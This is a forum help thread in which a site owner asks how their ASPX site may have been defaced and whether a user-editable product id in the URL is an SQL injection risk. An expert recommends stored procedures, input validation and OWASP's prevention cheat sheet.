Quip doubles as a “living” wiki and a project management tool that evolves with your organization. As you finish projects in Quip, the work remains, easily accessible to all team members, new and old.
- Increase transparency
- Onboard new hires faster
- Access from mobile/offline

 
LVL 1

Author Comment

by:renoduke
ID: 24348872
Ralmada, I thought some of the experts would have specific suggestions for known defacing attacks or may be familiar with the techniques used by this particular hacker.  I have read the suggested links as well as many others.  Of the top 10 only one seems to be the likely candidate.  SQL Injection.  The article has some guide lines but does not really give specifics on what you should look for.  As I said we are using aspx.  We are not using any dynamic SQL as appears to be the most common security risk.  We do not solicit user input, but users may be able to modify in input through URL.  This would indeed bring back a different record.  In our case this is not violation as the products are what we are trying to display on our web site.  There is no confidential information on the single table that the internetguest user has select permissions on.
Select pID,pName from products where products=?id.  Our web site fills in the ?id but a user can override.  So my question, is the ability to input an id with select only permission a hole for SQL injection?  
None of the other items in the article seem to fit.
The document on PCI security is for payment processing.  We do not have a shopping cart and do not process any payments.  
Thank you for you help
0
 
LVL 41

Expert Comment

by:ralmada
ID: 24350184
The PCI site is indeed for companies that process credit card payments. But, you should really take a look at it as a best practice guide.
Regarding the possibility of of Internet users to do a select. Yes, that's a security hole. You should consider putting the query into a stored procedure. Then you will need to validate the imput in the ?id parameter, to make sure it doesn't have any embedded query or sql command.
The OWASP gives some advise on SQL injection prevention. Please check this link:
http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
They mention, and I agree, that the key is to validate your input. "Input validation can be used to detect unauthorized input before it is passed to the SQL query". That's why I recommend the use of the stored procedure. Because you have the possibility to check whatever has been passed as a parameter and then use it as a parameter. For example:

create procedure yourprocedure @id varchar(1000)

as

begin

if @id <> 'expected result' --validate

  --treat is as an error

else

  select col1, col2 from yourtable where id = @id
 

end

Open in new window

0
 
LVL 1

Author Comment

by:renoduke
ID: 24350366
My mistake.  All our queries from SQL are from stored procedures.  Internet guest only has execute permission on these sp's.  I will review to see what kind of validators we can add to the sp's for the parameters that are passed into the sp's.  

Thank you
 
0
 
LVL 41

Accepted Solution

by:
ralmada earned 500 total points
ID: 24403265
Any luck?
Please don't forget to read and reread this link:
http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet  
0

Featured Post

Free Trending Threat Insights Every Day

Enhance your security with threat intelligence from the web. Get trending threat insights on hackers, exploits, and suspicious IP addresses delivered to your inbox with our free Cyber Daily.

Join & Write a Comment

Using in-flight Wi-Fi when you travel? Business travelers beware! In-flight Wi-Fi networks could rip the door right off your digital privacy portal. That’s no joke either, as it might also provide a convenient entrance for bad threat actors.
In this article we will get to know that how can we recover deleted data if it happens accidently. We really can recover deleted rows if we know the time when data is deleted by using the transaction log.
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, Just open a new email message.  In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
Here's a very brief overview of the methods PRTG Network Monitor (https://www.paessler.com/prtg) offers for monitoring bandwidth, to help you decide which methods you´d like to investigate in more detail.  The methods are covered in more detail in o…

705 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

20 Experts available now in Live!

Get 1:1 Help Now